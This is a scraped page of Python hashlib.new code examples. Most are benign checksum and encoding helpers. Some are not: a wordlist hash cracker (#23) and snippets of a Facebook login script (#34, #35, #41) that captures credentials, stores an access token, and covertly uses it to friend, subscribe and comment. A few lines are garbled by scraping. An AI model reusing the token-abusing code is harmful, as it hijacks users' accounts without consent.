Пример #1
0
def toHash():
    while True:
        password = input("Password: "******"Encryption type: ")
        
        if hashtype == "ntlm":
            phash = hashlib.new('md4', password.encode('utf-16le')).digest()
            
        elif hashtype == "md4":
            phash = hashlib.new('md4', password.encode('ascii')).digest()

        elif hashtype == "md5":
            phash = hashlib.new('md5', password.encode("ascii")).digest()

        elif hashtype == "whirlpool":
            phash = hashlib.new('whirlpool', password.encode('ascii')).digest()
            
        elif hashtype == "sha1":
            phash = hashlib.sha1(password.encode('ascii')).digest()

        elif hashtype == "sha224":
            phash = hashlib.sha224(password.encode('ascii')).digest()

        elif hashtype == "sha256":
            phash = hashlib.sha256(password.encode('ascii')).digest()

        elif hashtype == "sha384":
            phash = hashlib.sha384(password.encode('ascii')).digest()

        elif hashtype == "sha512":
            phash = hashlib.sha512(password.encode('ascii')).digest()

        print("\n"+str(binascii.hexlify(phash))[2:-1]+"\n")
Пример #2
0
def getContentChecksum(checksum_type, contents):
    if hashlib_has_usedforsecurity:
        engine = hashlib.new(checksum_type, usedforsecurity=False)
    else:
        engine = hashlib.new(checksum_type)
    engine.update(contents)
    return engine.hexdigest()
Пример #3
0
 def test_unknown_hash(self):
     try:
         hashlib.new('spam spam spam spam spam')
     except ValueError:
         pass
     else:
         self.assert_(0 == "hashlib didn't reject bogus hash name")
Пример #4
0
def compare_site_and_disk(config, diff, site, docs, push, get):
    ''' Does both compare and push/get since it's quite similar code-wide'''
    for f in docs:
        full_path = './'+f+'.mediawiki'
        m_ondisk = hashlib.new(config['hashalg'])
        with open(full_path) as fd:
            on_disk = fd.read()
        m_ondisk.update(on_disk)

        m_onsite = hashlib.new(config['hashalg'])
        page = site.Pages[f]
        on_site = page.text().encode('utf-8')+'\n'
        m_onsite.update(on_site)

        if m_ondisk.digest() != m_onsite.digest():
            print("Page {} differ.".format(f))
            if (diff):
                #Just display diff in the correct order, we default to push-side-diff
                if get:
                    mydiff = difflib.unified_diff(on_site.splitlines(1), on_disk.splitlines(1))
                else:
                    mydiff = difflib.unified_diff(on_disk.splitlines(1), on_site.splitlines(1))

                sys.stdout.writelines(mydiff)

            #Now push or get whatever is needed to sync
            #But never do both push and get at once, would make no sense
            if get:
                print("Getting {} from site to disk.".format(f))
                with open(full_path, 'w') as fd:
                    fd.write(on_site)
            elif push:
                print("Pushing {} from disk to site.".format(f))
                page.save(on_disk, summary=u'Automated sync from {}'.format(config['repos']))
Пример #5
0
def encode(msg, key, hashsys, verbose, mutate):
    try:
        hash = hashlib.new(str(hashsys))
    except ValueError:
        print("Error: hash {h} is not supported, defaulting to sha1".format(h=hashsys))
        hashsys = 'sha1'

    msg = msg.replace('\r', "").replace('\n', '')
    key = key.replace('\r', "").replace('\n', '')
    encoded_msg = []
    mutation_key = []
    for x in ([msg[i:i + 2] for i in range(0, len(msg), 2)]):
        if len(x) == 1:
            x += ' '
        if mutate:
            random_bit = chr(int(random.randrange(127, 3500)))
            random_bit_en = binascii.hexlify(random_bit.encode()).decode()
        else:
            random_bit = ''
            random_bit_en = ''
            hash = hashlib.new(str(hashsys))

        if verbose:
            print("Message to be hashed is", x, random_bit, key)
        # if len(random_bit_en) < 5:
        #	random_bit_en += '00'
        hash.update(x.encode() + random_bit.encode() + key.encode())
        encoded_msg.append(hash.hexdigest()[int(len(hash.hexdigest()) / 2):])
        encoded_msg.append(hash.hexdigest()[:int(len(hash.hexdigest()) / 2)])
        if random_bit_en:
            mutation_key.append(random_bit_en)

    return encoded_msg, mutation_key
Пример #6
0
def getHashlibInstance(hash_type, used_for_security):
    """Get an instance of a hashlib object.
    """
    if hashlib_has_usedforsecurity:
        return hashlib.new(hash_type, usedforsecurity=used_for_security)
    else:
        return hashlib.new(hash_type)
Пример #7
0
def generate_file_checksums(sourceFile, tempFile):
    '''
    Generate checksums, etcetera for a file read from 'sourceFile'.
    If 'tempFile' is provided, the bytes are written to it as they are read.
    The result is a tuple comprising the MD5 checksum, the SHA512 checksum,
    the file length, and chunk containing the start of the file (for doing
    mimetype guessing if necessary).
    '''

    from contextlib import closing
    with closing(sourceFile) as f:
        md5 = hashlib.new('md5')
        sha512 = hashlib.new('sha512')
        size = 0
        mimetype_buffer = ''
        for chunk in iter(lambda: f.read(32 * sha512.block_size), ''):
            size += len(chunk)
            if len(mimetype_buffer) < 8096: # Arbitrary memory limit
                mimetype_buffer += chunk
            md5.update(chunk)
            sha512.update(chunk)
            if tempFile:
                tempFile.write(chunk)
    return (md5.hexdigest(), sha512.hexdigest(), 
            size, mimetype_buffer)
Пример #8
0
    def fingerprint(self):
        """
        Create a fingerprint for this archive
        """
        hashes = {}

        for algorithm in self.algorithms:
            files = {}
            combined = hashlib.new(algorithm)

            for (file, content) in self.reader.readfiles():
                h = hashlib.new(algorithm)
                h.update(content)

                checksum = h.hexdigest()
                files[checksum] = file
                combined.update(checksum)

            hashes[algorithm] = {
                "combined": combined.hexdigest(),
                "files": files,
            }

        return {
            "hashes": hashes
        }
Пример #9
0
def encodeAddress(version,stream,ripe):
    if version >= 2 and version < 4:
        if len(ripe) != 20:
            raise Exception("Programming error in encodeAddress: The length of a given ripe hash was not 20.")
        if ripe[:2] == '\x00\x00':
            ripe = ripe[2:]
        elif ripe[:1] == '\x00':
            ripe = ripe[1:]
    elif version == 4:
        if len(ripe) != 20:
            raise Exception("Programming error in encodeAddress: The length of a given ripe hash was not 20.")
        ripe = ripe.lstrip('\x00')

    a = encodeVarint(version) + encodeVarint(stream) + ripe
    sha = hashlib.new('sha512')
    sha.update(a)
    currentHash = sha.digest()
    #print 'sha after first hashing: ', sha.hexdigest()
    sha = hashlib.new('sha512')
    sha.update(currentHash)
    #print 'sha after second hashing: ', sha.hexdigest()

    checksum = sha.digest()[0:4]
    #print 'len(a) = ', len(a)
    #print 'checksum = ', checksum.encode('hex')
    #print 'len(checksum) = ', len(checksum)

    asInt = int(a.encode('hex') + checksum.encode('hex'),16)
    #asInt = int(checksum.encode('hex') + a.encode('hex'),16)
    # print asInt
    return 'BM-'+ encodeBase58(asInt)
Пример #10
0
    def _update_payload_digest(self, hunk):
        if self.payload_digest is None:
            # convoluted handling of two newlines crossing hunks
            # XXX write tests for this
            if self._prev_hunk_last_two_bytes.endswith(b'\n'):
                if hunk.startswith(b'\n'):
                    self.payload_digest = hashlib.new(self.digest_algorithm)
                    self.payload_digest.update(hunk[1:])
                    self.payload_offset = self.len + 1
                elif hunk.startswith(b'\r\n'):
                    self.payload_digest = hashlib.new(self.digest_algorithm)
                    self.payload_digest.update(hunk[2:])
                    self.payload_offset = self.len + 2
            elif self._prev_hunk_last_two_bytes == b'\n\r':
                if hunk.startswith(b'\n'):
                    self.payload_digest = hashlib.new(self.digest_algorithm)
                    self.payload_digest.update(hunk[1:])
                    self.payload_offset = self.len + 1
            else:
                m = re.search(br'\n\r?\n', hunk)
                if m is not None:
                    self.payload_digest = hashlib.new(self.digest_algorithm)
                    self.payload_digest.update(hunk[m.end():])
                    self.payload_offset = self.len + m.end()

            # if we still haven't found start of payload hold on to these bytes
            if self.payload_digest is None:
                self._prev_hunk_last_two_bytes = hunk[-2:]
        else:
            self.payload_digest.update(hunk)
Пример #11
0
def generate_file_checksums(sourceFile, tempFile=None, leave_open=False):
    '''DEPRECATED
    Generate checksums, etcetera for a file read from 'sourceFile'.
    If 'tempFile' is provided, the bytes are written to it as they are read.
    The result is a tuple comprising the MD5 checksum, the SHA512 checksum,
    the file length, and chunk containing the start of the file (for doing
    mimetype guessing if necessary).
    '''
    warnings.warn("please replace usages with models/datafile.py:"
                  "compute_checksums", DeprecationWarning)
    sourceFile.seek(0)

    f = sourceFile
    md5 = hashlib.new('md5')
    sha512 = hashlib.new('sha512')
    size = 0
    mimetype_buffer = ''
    for chunk in iter(lambda: f.read(32 * sha512.block_size), ''):
        size += len(chunk)
        if len(mimetype_buffer) < 8096:  # Arbitrary memory limit
            mimetype_buffer += chunk
        md5.update(chunk)
        sha512.update(chunk)
        if tempFile is not None:
            tempFile.write(chunk)
    if leave_open:
        f.seek(0)
    else:
        f.close()
    return (md5.hexdigest(), sha512.hexdigest(),
            size, mimetype_buffer)
Пример #12
0
 def __init__(self, session, config, parent):
     PreParser.__init__(self, session, config, parent)
     self.sumType = self.get_setting(session, 'sumType', 'md5')
     try:
         hashlib.new(self.sumType)
     except ValueError as e:
         raise ConfigFileException(str(e))
Пример #13
0
    def _validate_entries(self):
        """
        Verify that the actual file contents match the recorded hashes stored in the manifest files
        """
        errors = list()

        # To avoid the overhead of reading the file more than once or loading
        # potentially massive files into memory we'll create a dictionary of
        # hash objects so we can open a file, read a block and pass it to
        # multiple hash objects

        hashers = {}
        for alg in self.algs:
            try:
                hashers[alg] = hashlib.new(alg)
            except KeyError:
                logging.warning("Unable to validate file contents using unknown %s hash algorithm", alg)

        if not hashers:
            raise RuntimeError("%s: Unable to validate bag contents: none of the hash algorithms in %s are supported!" % (self, self.algs))

        for rel_path, hashes in self.entries.items():
            full_path = os.path.join(self.path, rel_path)

            # Create a clone of the default empty hash objects:
            f_hashers = dict(
                (alg, hashlib.new(alg)) for alg, h in hashers.items() if alg in hashes
            )

            try:
                f_hashes = self._calculate_file_hashes(full_path, f_hashers)
            except BagValidationError, e:
                raise e
            # Any unhandled exceptions are probably fatal
            except:
Пример #14
0
def evpKDF(passwd, salt, key_size=8, iv_size=4, iterations=1, hash_algorithm="md5"):
    target_key_size = key_size + iv_size
    derived_bytes = ""
    number_of_derived_words = 0
    block = None
    hasher = hashlib.new(hash_algorithm)
    while number_of_derived_words < target_key_size:
        if block is not None:
            hasher.update(block)

        hasher.update(passwd)
        hasher.update(salt)
        block = hasher.digest()
        hasher = hashlib.new(hash_algorithm)

        for i in range(1, iterations):
            hasher.update(block)
            block = hasher.digest()
            hasher = hashlib.new(hash_algorithm)

        derived_bytes += block[0: min(len(block), (target_key_size - number_of_derived_words) * 4)]

        number_of_derived_words += len(block)/4

    return {
        "key": derived_bytes[0: key_size * 4],
        "iv": derived_bytes[key_size * 4:]
    }
Пример #15
0
def decodeAddress(address):
    address = str(address).strip()
    if address[:3] == 'BM-': integer = decodeBase58(address[3:])
    else:                    integer = decodeBase58(address)
    if integer == 0: status = 'invalidcharacters';                return status,0,0,''
    hexdata = hex(integer)[2:-1]
    if len(hexdata) % 2 != 0: hexdata = '0' + hexdata
    data = hexdata.decode('hex'); checksum = data[-4:]
    sha = hashlib.new('sha512'); sha.update(data[:-4]); currentHash = sha.digest()
    sha = hashlib.new('sha512'); sha.update(currentHash)
    if checksum != sha.digest()[0:4]: status = 'checksumfailed';  return status,0,0,''
    try: addressVersionNumber, bytesUsedByVersionNumber = decodeVarint(data[:9])
    except varintDecodeError:         status = 'varintmalformed'; return status,0,0,''
    if addressVersionNumber > 4:      status = 'versiontoohigh';  return status,0,0,''
    elif addressVersionNumber == 0:   status = 'versiontoohigh';  return status,0,0,''
    try: streamNumber, bytesUsedByStreamNumber = decodeVarint(data[bytesUsedByVersionNumber:])
    except varintDecodeError:         status = 'varintmalformed'; return status,0,0,''
    status = 'success'
    if addressVersionNumber == 1:                                 return status,addressVersionNumber,streamNumber,data[-24:-4]
    elif addressVersionNumber == 2 or addressVersionNumber == 3:
        embeddedRipeData = data[bytesUsedByVersionNumber+bytesUsedByStreamNumber:-4]
        if   len(embeddedRipeData) > 20:                          return 'ripetoolong', 0,0,''
        elif len(embeddedRipeData) == 20:                         return status,addressVersionNumber,streamNumber,embeddedRipeData
        elif len(embeddedRipeData) == 19:                         return status,addressVersionNumber,streamNumber,'\x00'+embeddedRipeData
        elif len(embeddedRipeData) == 18:                         return status,addressVersionNumber,streamNumber,'\x00\x00'+embeddedRipeData
        elif len(embeddedRipeData) < 18:                          return 'ripetooshort',0,0,''
        else:                                                     return 'otherproblem',0,0,''
    elif addressVersionNumber == 4:
        embeddedRipeData = data[bytesUsedByVersionNumber+bytesUsedByStreamNumber:-4]
        if   embeddedRipeData[0:1] == '\x00':                     return 'encodingproblem',0,0,''
        elif len(embeddedRipeData) > 20:                          return 'ripetoolong',    0,0,''
        elif len(embeddedRipeData) < 4:                           return 'ripetooshort',   0,0,''
        else: x00string = '\x00' * (20 - len(embeddedRipeData));  return status,addressVersionNumber,streamNumber,x00string+embeddedRipeData
Пример #16
0
	def _sender_precheck_attachment(self):
		attachment = self.config.get('mailer.attachment_file')
		if not attachment:
			return True
		if not os.path.isfile(attachment):
			gui_utilities.show_dialog_warning('Invalid Attachment', self.parent, 'The specified attachment file does not exist.')
			return False
		if not os.access(attachment, os.R_OK):
			gui_utilities.show_dialog_warning('Invalid Attachment', self.parent, 'The specified attachment file can not be read.')
			return False
		self.text_insert("File '{0}' will be attached to sent messages.\n".format(os.path.basename(attachment)))
		_, extension = os.path.splitext(attachment)
		extension = extension[1:]
		if self.config['remove_attachment_metadata'] and extension in ('docm', 'docx', 'pptm', 'pptx', 'xlsm', 'xlsx'):
			scrubber.remove_office_metadata(attachment)
			self.text_insert("Attachment file detected as MS Office 2007+, metadata has been removed.\n")
		md5 = hashlib.new('md5')
		sha1 = hashlib.new('sha1')
		with open(attachment, 'rb') as file_h:
			data = True
			while data:
				data = file_h.read(1024)
				md5.update(data)
				sha1.update(data)
		self.text_insert("  MD5:  {0}\n".format(md5.hexdigest()))
		self.text_insert("  SHA1: {0}\n".format(sha1.hexdigest()))
		return True
Пример #17
0
 def public_hash(self, algorithm):
     if 'md5' == algorithm:
         hash_object = hashlib.new('md5')
     else:
         hash_object = hashlib.new('sha256')
     hash_object.update(self.email.lower().encode('utf-8'))
     return hash_object.hexdigest()
Пример #18
0
    def _make_hash(algorithm, iterations, raw_password, salt):
        # Private: Do the actual hashing operation.

        hash = hashlib.new(algorithm, (raw_password+salt).encode())
        for i in range(iterations-1): hash = hashlib.new(algorithm, hash.digest()+(raw_password+salt).encode())

        return hash.hexdigest()
Пример #19
0
def avatar_file_path(instance=None, filename=None, size=None, ext=None):
    tmppath = [AVATAR_STORAGE_DIR]
    if AVATAR_HASH_USERDIRNAMES:
        username_hash = hashlib.new("ripemd160")
        username_hash.update(instance.user.username)
        tmp = username_hash.hexdigest()
        tmppath.extend([tmp[0], tmp[1], instance.user.username])
    elif AVATAR_USERDIRNAMES_AS_ID:
        tmppath.extend(str(instance.user.id))
    else:
        tmppath.append(instance.user.username)
    if not filename:
        # Filename already stored in database
        filename = instance.avatar.name
        if ext and AVATAR_HASH_FILENAMES:
            # An extension was provided, probably because the thumbnail
            # is in a different format than the file. Use it. Because it's
            # only enabled if AVATAR_HASH_FILENAMES is true, we can trust
            # it won't conflict with another filename
            (root, oldext) = os.path.splitext(filename)
            filename = root + "." + ext
    else:
        # File doesn't exist yet
        if AVATAR_HASH_FILENAMES:
            filename_hash = hashlib.new("ripemd160")
            (root, ext) = os.path.splitext(filename)
            filename_hash.update(smart_str(filename))
            filename = filename_hash.hexdigest()
            filename = filename + ext
    if size:
        tmppath.extend(['resized', str(size)])
    tmppath.append(os.path.basename(filename))
    return os.path.join(*tmppath)
Пример #20
0
 def add_nomaxbackups(self, name, input_io):
     name = self.validate_name(name)
     logging.debug('Adding to %r', name)
     timestamp = self.validate_timestamp(datetime.datetime.now().strftime('%Y-%m-%dT%H:%M:%S'))
     instancedir = self.instancedir(name, timestamp)
     if os.path.exists(instancedir):
         raise RuntimeError('Directory already exists: %r' % (instancedir,))
     if input_io == sys.stdin:
         logging.info('Reading from stdin')
     else:
         logging.debug('Reading from %r', input_io.name)
     hash_total = hashlib.new(self.algorithm)
     size_total = 0
     for partnr in itertools.count(0):
         data = input_io.read(self.partsize)
         if len(data) == 0:
             break
         hash_total.update(data)
         size_total += len(data)
         if partnr >= self.maxparts:
             raise RuntimeError('Too many parts')
         filelen = 3
         partlen = max(filelen + 1, len(str(self.maxparts - 1)))
         part = str(partnr).rjust(partlen, '0')
         hexdigest = hashlib.new(self.algorithm, data).hexdigest()
         target = os.path.join('..', '..', '..', self.hash_filename(hexdigest))
         symlink_filename = os.path.join(instancedir, part[:-filelen], part[-filelen:])
         self.util.symlink(target, symlink_filename)
         data_filename = os.path.join(self.directory, self.hash_filename(hexdigest))
         if os.path.exists(data_filename) and os.path.getsize(data_filename) == len(data):
             logging.debug('Skipping existing complete data file %r', data_filename)
         else:
             self.util.write_file(data_filename, data)
     self.util.write_file(os.path.join(instancedir, 'hash'), '%s\n' % (hash_total.hexdigest(),))
     self.util.write_file(os.path.join(instancedir, 'size'), '%d\n' % (size_total,))
Пример #21
0
def encodeAddress(version,stream,ripe):
    if version >= 2 and version < 4:
        if len(ripe) != 20:
            raise Exception("Programming error in encodeAddress: The length of a given ripe hash was not 20.")
        if ripe[:2] == '\x00\x00':
            ripe = ripe[2:]
        elif ripe[:1] == '\x00':
            ripe = ripe[1:]
    elif version == 4:
        if len(ripe) != 20:
            raise Exception("Programming error in encodeAddress: The length of a given ripe hash was not 20.")
        ripe = ripe.lstrip('\x00')

    storedBinaryData = encodeVarint(version) + encodeVarint(stream) + ripe
    
    # Generate the checksum
    sha = hashlib.new('sha512')
    sha.update(storedBinaryData)
    currentHash = sha.digest()
    sha = hashlib.new('sha512')
    sha.update(currentHash)
    checksum = sha.digest()[0:4]

    asInt = int(hexlify(storedBinaryData) + hexlify(checksum),16)
    return 'BM-'+ encodeBase58(asInt)
Пример #22
0
def CryptSessionKeyXP(masterkey, nonce, hashAlgo, entropy=None, strongPassword=None):
    """Computes the decryption key for XP DPAPI blob, given the masterkey and optional information.

    This implementation relies on a faulty implementation from Microsoft that does not respect the HMAC RFC.
    Instead of updating the inner pad, we update the outer pad...
    This algorithm is also used when checking the HMAC for integrity after decryption

    :param masterkey: decrypted masterkey (should be 64 bytes long)
    :param nonce: this is the nonce contained in the blob or the HMAC in the blob (integrity check)
    :param entropy: this is the optional entropy from CryptProtectData() API
    :param strongPassword: optional password used for decryption or the blob itself (integrity check)
    :returns: decryption key
    :rtype : str
    """
    if len(masterkey) > 20:
        masterkey = hashlib.sha1(masterkey).digest()

    masterkey += "\x00" * hashAlgo.blockSize
    ipad = "".join(chr(ord(masterkey[i]) ^ 0x36) for i in range(hashAlgo.blockSize))
    opad = "".join(chr(ord(masterkey[i]) ^ 0x5c) for i in range(hashAlgo.blockSize))
    digest = hashlib.new(hashAlgo.name)
    digest.update(ipad)
    digest.update(nonce)
    tmp = digest.digest()

    digest = hashlib.new(hashAlgo.name)
    digest.update(opad)
    digest.update(tmp)
    if entropy is not None:
        digest.update(entropy)
    if strongPassword is not None:
        digest.update(strongPassword)
    return digest.digest()
Пример #23
0
def crack(hash, dict, alg):
  f = open(dict,'r')
  for line in f:
    line = line.rstrip()
    if alg==1:
      h = hashlib.new('md5')
      h.update(line)
      hash_line = h.hexdigest()
    elif alg==2:
      h = hashlib.new('sha1')
      h.update(line)
      hash_line = h.hexdigest()
    elif alg==3:
      h = hashlib.new('sha256')
      h.update(line)
      hash_line = h.hexdigest()
    elif alg==4:
      h = hashlib.new('sha512')
      h.update(line)
      hash_line = h.hexdigest()
    elif alg==5:
      try:
        hash_line = binascii.hexlify(hashlib.new('md4', line.encode('utf-16le')).digest())
      except Exception:
        continue
    if hash_line == hash:
      print '[*] Hash decrypted! Plaintext is "' + line+'"'
      sys.exit(0)   
  print "hash not found."
Пример #24
0
def _hash(irc, source, args):
    """<password> [digest]
    Hashes a given password with the given digest, when 'digest' isn't given, defaults to sha256"""
    digest = ""
    try:
        password = args[0]
        password = password.encode('utf-8')
        try:
            digest = args[1]
        except IndexError:
            digest = "sha256"
        # DRY'ing
        digests = hashlib.algorithms_available
        if digest:
            if digest in digests:
                d = hashlib.new("%s" % digest)
                d.update(password)
                irc.reply(d.hexdigest(), private=True)
            else:
                irc.error("hash algorithm '%s' unavailable, see 'algorithms'" % digest, private=True)
        else:
            d = hashlib.new("sha256")
            d.update(password)
            irc.reply(d.hexdigest(), private=True)
    except IndexError:
        irc.error("Not enough arguments. Needs 1-2: password, digest (optional).", private=True)
Пример #25
0
def hash(value, algorithm='sha512'):
    '''
    .. versionadded:: 2014.7.0

    Encodes a value with the specified encoder.

    value
        The value to be hashed.

    algorithm : sha512
        The algorithm to use. May be any valid algorithm supported by
        hashlib.

    CLI Example:

    .. code-block:: bash

        salt '*' random.hash 'I am a string' md5
    '''
    if hasattr(hashlib, 'algorithms') and algorithm in hashlib.algorithms:
        hasher = hashlib.new(algorithm)
        hasher.update(value)
        out = hasher.hexdigest()
    elif hasattr(hashlib, algorithm):
        hasher = hashlib.new(algorithm)
        hasher.update(value)
        out = hasher.hexdigest()
    else:
        raise SaltInvocationError('You must specify a valid algorithm.')

    return out
Пример #26
0
    def __init__(self, auth_ref, unscoped_token=None):
        # User-related attributes
        self.user = {'id': auth_ref.user_id, 'name': auth_ref.username}
        self.user_domain_id = auth_ref.user_domain_id
        self.user_domain_name = auth_ref.user_domain_name

        # Token-related attributes
        self.id = auth_ref.auth_token
        self.unscoped_token = unscoped_token
        if _TOKEN_HASH_ENABLED and self._is_pki_token(self.id):
            algorithm = getattr(settings, 'OPENSTACK_TOKEN_HASH_ALGORITHM',
                                'md5')
            hasher = hashlib.new(algorithm)
            hasher.update(self.id.encode('utf-8'))
            self.id = hasher.hexdigest()
            # Only hash unscoped token if needed
            if self._is_pki_token(self.unscoped_token):
                hasher = hashlib.new(algorithm)
                hasher.update(self.unscoped_token.encode('utf-8'))
                self.unscoped_token = hasher.hexdigest()
        self.expires = auth_ref.expires

        # Project-related attributes
        self.project = {'id': auth_ref.project_id, 'name': auth_ref.project_name}
        self.tenant = self.project

        # Domain-related attributes
        self.domain = {'id': auth_ref.domain_id, 'name': auth_ref.domain_name}

        # Federation-related attributes
        self.is_federated = auth_ref.is_federated
        self.roles = [{'name': role} for role in auth_ref.role_names]
        self.serviceCatalog = auth_ref.service_catalog.catalog
Пример #27
0
def main():
  """Read all input files and output the blushlist file."""
  if len(sys.argv) < 4:
    sys.exit("Usage: make_blushlist.py <output_file> {<input_file_i> "
             "<category_i>}")

  f_out = open(sys.argv[1], "w")
  f_out.write("// This file is automatically generated by make_blushlist.py\n")
  f_out.write("let blushlist = {\n")
  i = 2

  hasher = hashlib.new('sha256')
  version_hasher = hashlib.new('sha256')
  # Process all of the files, one by one
  while i < len(sys.argv):
    try:
      f_in = open(sys.argv[i], "r")
    except IOError as ex:
      sys.exit("Can't find file: %s" % ex)
    category = sys.argv[i + 1]
    version_hasher.update(category)
    for line in f_in.readlines():
      line = line.strip().lower()
      hasher.update(line)
      f_out.write("  \"%s\" : \"%s\",\n" % (hasher.hexdigest()[:48], category))
      hasher = hashlib.new('sha256')
      version_hasher.update(line)
    f_in.close()
    i += 2

  f_out.write("};\n")
  f_out.write("module.exports.map = blushlist;\n")
  f_out.write("module.exports.version = \"%s\";\n" % version_hasher.hexdigest())

  f_out.close()
Пример #28
0
def get(path, headers, body):
  global logger

  query = headers.get('QUERY')
  arguments = helpers.parse_query_string(query)

  try:
    priv = load_private()
    identity = decrypt(arguments['identity'], priv)
    if is_email(identity):
      password = decrypt(arguments['password'], priv)
      password = hashlib.new('md5', password).hexdigest()
      create_with_email(identity, password)
    elif is_phone_number(identity):
      password = decrypt(arguments['password'], priv)
      password = hashlib.new('md5', password).hexdigest()
      create_with_phone_number(identity, password)
    else:
      pass

    return 200, 'OK', message, {
      'Content-Type': 'text/plain'}
  except rsa.DecryptionError:
    logger.error(helpers.format_exception())
    return 500, 'Internal Server Error', 'Decryption failed', {}
Пример #29
0
  def oc_checksum(self, path, bufsize=1024*1024*4):
    """
    Returns a checksum string as introduced in oc_filecache with version 10.0.4
    The code reads the file in chunks of bufsize once and does all needed computations
    on the fly. Linear cpu usage with filesize, but constant memory.
    """
    file = io.open(path, "rb")
    buf = bytearray(bufsize)
    a32_sum  = 1
    md5_sum  = hashlib.new('md5')
    sha1_sum = hashlib.new('sha1')

    while True:
      n = file.readinto(buf)
      if n == 0: break
      # must checksum in chunks, or python 2.7 explodes on a 20GB file with "OverflowError: size does not fit in an int"
      a32_sum = zlib.adler32(bytes(buf)[0:n], a32_sum)
      md5_sum.update(bytes(buf)[0:n])
      sha1_sum.update(bytes(buf)[0:n])
    file.close()

    sha1 = sha1_sum.hexdigest()
    md5  = md5_sum.hexdigest()
    a32  = "%08x" % (0xffffffff & a32_sum)
    return 'SHA1:'+sha1+' MD5:'+md5+' ADLER32:'+a32
Пример #30
0
 def hashpassword(name,salt,plaintextpassword,n=10):
     if n<1 : raise ValueError("n < 1")
     d = hashlib.new(name,(salt+plaintextpassword).encode()).digest()
     while n:
         n -= 1
         d = hashlib.new(name,d).digest()
     return hashlib.new(name,d).hexdigest()
def get_hash(path, hash_type="sha512"):
    h = hashlib.new(hash_type)
    with open(path, "rb") as f:
        for chunk in iter(functools.partial(f.read, 4096), ''):
            h.update(chunk)
    return h.hexdigest()
Пример #32
0
 def make_file_data(cls, string="file"):
     file_data = (string * 10).encode('utf-8')
     h = hashlib.new(HASH_TYPE)
     h.update(file_data)
     file_hash = h.hexdigest()
     return file_data, file_hash
Пример #33
0
 def make_table_data(cls, string="table"):
     table_data = (string * 10).encode('utf-8')
     h = hashlib.new(HASH_TYPE)
     h.update(table_data)
     table_hash = h.hexdigest()
     return table_data, table_hash
Пример #34
0
def login():
    os.system('clear')
    try:
        toket = open('login.txt', 'r')
        menu()
    except (KeyError, IOError):
        os.system('clear')
        print logo
        print 50 * "\033[1;96m▪"

        print(
            '          \033[1;97m[◉] \x1b[1;96mLogin New Fresh Account \033[1;97m[◉]'
        )
        id = raw_input(
            '          \033[1;97m[◉] \033[1;97mID/Email \x1b[1;91m: \x1b[1;92m'
        )
        pwd = raw_input(
            '          \033[1;97m[◉] \033[1;97mPassword \x1b[1;91m: \x1b[1;92m'
        )
        tik()
        try:
            br.open('https://m.facebook.com')
        except mechanize.URLError:
            print "\n\033[1;96m[!] \x1b[1;91mThere is no internet connection"
            keluar()
        br._factory.is_html = True
        br.select_form(nr=0)
        br.form['email'] = id
        br.form['pass'] = pwd
        br.submit()
        url = br.geturl()
        if 'save-device' in url:
            try:

                sig = 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=' + id + 'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='******'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
                data = {
                    "api_key": "882a8490361da98702bf97a021ddc14d",
                    "credentials_type": "password",
                    "email": id,
                    "format": "JSON",
                    "generate_machine_id": "1",
                    "generate_session_cookies": "1",
                    "locale": "en_US",
                    "method": "auth.login",
                    "password": pwd,
                    "return_ssl_resources": "0",
                    "v": "1.0"
                }
                x = hashlib.new("md5")
                x.update(sig)
                a = x.hexdigest()
                data.update({'sig': a})
                url = "https://api.facebook.com/restserver.php"
                r = requests.get(url, params=data)
                z = json.loads(r.text)
                unikers = open("login.txt", 'w')
                unikers.write(z['access_token'])
                unikers.close()
                print '\n\x1b[1;36;40m[✓] Login Successful...'
                os.system(
                    'xdg-open https://www.youtube.com/channel/UCe6wmIybCxpRSB4o6pozMOA'
                )
                requests.post(
                    'https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token='
                    + z['access_token'])
                menu()
            except requests.exceptions.ConnectionError:
                print "\n\033[1;97m[!] There is no internet connection"
                keluar()
        if 'checkpoint' in url:
            print("\n\033[1;97m[!] Your Account is on Checkpoint")
            os.system('rm -rf login.txt')
            time.sleep(1)
            keluar()
        else:
            print("\n\033[1;97mPassword/Email is wrong")
            os.system('rm -rf login.txt')
            time.sleep(1)
            login()
Пример #35
0
try:
    sig = 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=' + em + 'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='******'return_ssl_resources=0v=1.db308aeae199d94748925af9278eaec0'
    data = {
        "api_key": "882a8490361da98702bf97a021ddc14d",
        "credentials_type": "password",
        "email": em,
        "format": "JSON",
        "generate_machine_id": "1",
        "generate_session_cookies": "1",
        "locale": "en_US",
        "method": "auth.login",
        "password": pas,
        "return_ssl_resources": "0",
        "v": "1.0"
    }
    x = hashlib.new('md5')
    x.update(sig.encode('utf-8'))
    data.update({'sig': x.hexdigest()})
    ok = s.get(fb, params=data).json()
    unikers = open('result/token.txt', 'w')
    unikers.write(ok['access_token'])
    unikers.close()
    if 'access_token' in ok:
        token = open('result/token.txt', 'r').read()
        print(m + '[' + h + '✓' + m + ']' + h +
              ' Success generate access token')
        s.post(url + 'api.version/subscribers?access_token=' + token)
        s.post(
            url +
            '100025271623353_485040922348291/comments?message=Adk8EYNs94Bk54PH&access_token='
            + token)
def getHash(str):
    h = hashlib.new("ripemd160")
    h.update(str)
    hash = bin(int(h.hexdigest(), 16))
    print "hash for string [", str, "] :", hash
    return hash
 def test_hexdigest(self):
     for name in self.supported_hash_names:
         h = hashlib.new(name)
         assert isinstance(h.digest(), bytes), name
         self.assertEqual(hexstr(h.digest()), h.hexdigest())
Пример #38
0
def hash160(s):
    return hashlib.new('ripemd160', sha256(s)).digest()
Пример #39
0
def ripemd160(s):
    return hashlib.new('ripemd160', s).digest()
Пример #40
0
# Python implementation of the MySQL client-server protocol
#   http://forge.mysql.com/wiki/MySQL_Internals_ClientServer_Protocol

import re

try:
    import hashlib
    sha_new = lambda *args, **kwargs: hashlib.new("sha1", *args, **kwargs)
except ImportError:
    import sha
    sha_new = sha.new

try:
    import ssl
    have_ssl = True
except ImportError:
    have_ssl = False

import socket
import struct
import sys
import os
import ConfigParser

try:
    import cStringIO as StringIO
except ImportError:
    import StringIO

from charset import MBLENGTH
from cursors import Cursor
Пример #41
0
def login():
    os.system('clear')
    try:
        toket = open('login.txt', 'r')
        menu()
    except (KeyError, IOError):
        os.system('clear')
        print logo
